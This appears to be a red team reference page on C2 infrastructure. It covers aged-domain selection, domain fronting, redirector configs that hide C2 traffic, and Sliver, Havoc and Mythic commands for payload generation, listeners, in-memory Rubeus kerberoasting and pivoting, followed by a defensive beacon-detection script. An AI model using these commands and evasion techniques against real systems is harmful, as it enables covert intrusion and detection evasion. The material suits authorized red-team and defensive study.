Red Team

C2 Infrastructure & Frameworks

Command and control infrastructure is the backbone of red team operations. Proper setup ensures reliable communications while evading detection.

Warning

C2 infrastructure should only be used during authorized engagements with proper legal agreements.

C2 Infrastructure Architecture

Infrastructure Components

Domain Setup

bash
# Domain categorization for C2
# Purchase aged domains categorized as:
# - Business, Healthcare, Technology
# Check categorization: sitereview.bluecoat.com

# Domain fronting (where available)
# Use CDN providers that share domains
# Azure CDN, Cloudflare (limited), Fastly

# ExpiredDomains.net for aged domains
# Look for:
# - Clean reputation
# - Existing backlinks
# - Relevant categorization

Redirectors

apache
# Apache mod_rewrite redirector
# Only forward valid C2 traffic, send others to legitimate site
# Requires mod_rewrite and mod_proxy (the [P] flag proxies the matched request)
# Both RewriteCond lines apply only to the first RewriteRule; the second rule catches everything else

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} "Mozilla/5.0.*" [NC]
RewriteCond %{REQUEST_URI} ^/api/update.*
RewriteRule ^.*$ https://c2server.internal%{REQUEST_URI} [P]
RewriteRule ^.*$ https://legitimate-site.com [L,R=302]

nginx
# Nginx redirector
# listen 443 ssl requires a certificate/key pair (see SSL Certificates below); paths are placeholders
server {
    listen 443 ssl;
    server_name yourdomain.com;
    ssl_certificate     /etc/ssl/certs/yourdomain.com.pem;
    ssl_certificate_key /etc/ssl/private/yourdomain.com.key;

    location /api/update {
        proxy_pass https://c2server.internal;
    }

    location / {
        return 302 https://legitimate-site.com;
    }
}

SSL Certificates

bash
# Let's Encrypt (free, but every issued certificate is published in public Certificate Transparency logs)
certbot certonly --standalone -d yourdomain.com

# Or use cloud provider certificates
# AWS ACM, Azure App Service certificates

# Self-signed for internal
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

C2 Frameworks

Cobalt Strike

Industry standard commercial C2. Malleable C2 profiles, beacon payloads.

Commercial License Required

Sliver

Open-source C2 by BishopFox. Multi-platform, multiplayer, evasive.

Free / Open Source

Havoc

Modern C2 with demon agents. Sleep obfuscation, syscall evasion.

Free / Open Source

Mythic

Modular framework with multiple agents. Docker-based deployment.

Free / Open Source

Sliver C2

Server Setup

bash
# Download and run Sliver server
curl https://sliver.sh/install | sudo bash
sliver-server

# Generate multiplayer config for operators
sliver > new-operator --name operator1 --lhost yourserver.com

# Import config on operator machine
sliver-client import operator1_config.cfg

Payload Generation

bash
# Generate beacon (async, periodic check-in)
sliver > generate beacon --mtls yourserver.com:443 --os windows --arch amd64 --format exe --save beacon.exe

# Generate session (real-time, interactive)
sliver > generate --mtls yourserver.com:443 --os windows --arch amd64 --format exe --save session.exe

# Shellcode for custom loaders
sliver > generate beacon --mtls yourserver.com:443 --format shellcode --save beacon.bin

# Staged payload (smaller initial size)
sliver > generate stager --lhost yourserver.com --lport 443 --protocol tcp --save stager.exe

Listeners

bash
# MTLS listener (encrypted)
sliver > mtls --lhost 0.0.0.0 --lport 443

# HTTPS listener
sliver > https --lhost 0.0.0.0 --lport 443 --domain yourdomain.com

# DNS listener (low and slow)
sliver > dns --domains yourdomain.com --lport 53

# WireGuard listener
sliver > wg --lport 53

Beacon Operations

bash
# List sessions/beacons
sliver > sessions
sliver > beacons

# Interact with beacon
sliver > use [beacon-id]

# Get interactive shell
sliver (BEACON) > shell

# Execute .NET assembly in memory
sliver (BEACON) > execute-assembly /path/to/Rubeus.exe kerberoast

# PowerShell execution
sliver (BEACON) > powershell -c "Get-Process"

# Port forwarding
sliver (BEACON) > portfwd add -b 127.0.0.1:8080 -r 10.10.10.5:80

# SOCKS proxy
sliver (BEACON) > socks5 start

# Pivot to other hosts
sliver (BEACON) > pivots tcp --bind 0.0.0.0:8888

Havoc C2

bash
# Start Havoc server
./havoc server --profile ./profiles/havoc.yaotl

# Connect with client
./havoc client

# Generate demon payload
# Payloads > Generate > Windows Shellcode/Exe

# Demon features:
# - Sleep obfuscation
# - Indirect syscalls
# - Stack spoofing
# - ETW/AMSI patching

Mythic C2

bash
# Install Mythic
git clone https://github.com/its-a-feature/Mythic
cd Mythic
./mythic-cli install github https://github.com/MythicAgents/apollo.git

# Start Mythic
./mythic-cli start

# Access web UI: https://localhost:7443
# Default creds: mythic_admin / a randomly generated password written to Mythic's .env file

# Supported agents:
# - Apollo (C#)
# - Poseidon (Go)
# - Merlin (Go)
# - Apfell (JavaScript)

C2 Profiles

Tip

C2 profiles customize traffic patterns to blend with legitimate traffic and evade detection.

text
# Cobalt Strike Malleable C2 Profile concepts
# Customize:
# - HTTP headers
# - URI paths
# - Request/response transforms
# - Sleep time and jitter
# - User-agent strings

# Key profile sections:
# http-get - Beacon check-in
# http-post - Data exfiltration
# http-stager - Staged payload delivery
# stage - Beacon configuration

# Example settings:
set sleeptime "60000";  # 60 seconds
set jitter "20";        # 20% randomization
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)...";
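Seen from the defender's side, a beacon configured with the sleep and jitter settings above shows up in redirector or proxy access logs as a near-constant check-in interval from one client to one URI (here the `/api/update` path from the redirector section). The following is an added example, not code from the page: it parses combined-format access log lines and flags client/URI pairs whose inter-request gaps have a low coefficient of variation; the log lines, the thresholds and the IP addresses are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Apache/Nginx "combined" log format: ip ident user [time] "req" status bytes "referer" "user-agent"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \d+ "[^"]*" "([^"]*)"')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, uri, status, ua = m.groups()
    return {"ip": ip, "ts": datetime.strptime(ts, TS_FMT), "method": method,
            "uri": uri, "status": int(status), "ua": ua}

def find_beacons(lines, min_requests=6, max_cv=0.35):
    """Flag (client, URI) series whose request gaps are nearly constant.
    A 60 s sleep with 20 % jitter lands every check-in within roughly 48-60 s,
    a coefficient of variation near 0.07; interactive browsing is well above 1."""
    series = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            series[(rec["ip"], rec["uri"])].append(rec["ts"])
    hits = []
    for (ip, uri), stamps in series.items():
        if len(stamps) < min_requests:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mu = mean(gaps)
        if mu <= 0:
            continue
        cv = pstdev(gaps) / mu
        if cv <= max_cv:
            hits.append({"client": ip, "uri": uri, "count": len(stamps),
                         "mean_gap_s": round(mu, 1), "cv": round(cv, 3)})
    return hits

# Constructed sample: 10.0.0.5 checks in every ~55 s (jittered); 10.0.0.9 browses irregularly.
def _line(ip, hms, uri, ua="Mozilla/5.0 (Windows NT 10.0; Win64; x64)"):
    return f'{ip} - - [10/Mar/2024:{hms} +0000] "GET {uri} HTTP/1.1" 200 512 "-" "{ua}"'

SAMPLE_LOG = [_line("10.0.0.5", t, "/api/update") for t in
              ("12:00:00", "12:00:55", "12:01:48", "12:02:46", "12:03:38", "12:04:34", "12:05:27")]
SAMPLE_LOG += [_line("10.0.0.9", t, "/") for t in
               ("12:00:03", "12:00:04", "12:00:30", "12:03:10", "12:03:11", "12:09:50", "12:09:52")]

if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_LOG):
        print(hit)
```

Tuning `max_cv` upward catches profiles with larger jitter at the cost of more false positives from polling web apps, so pair the score with the request count and the URI's prevalence across the fleet.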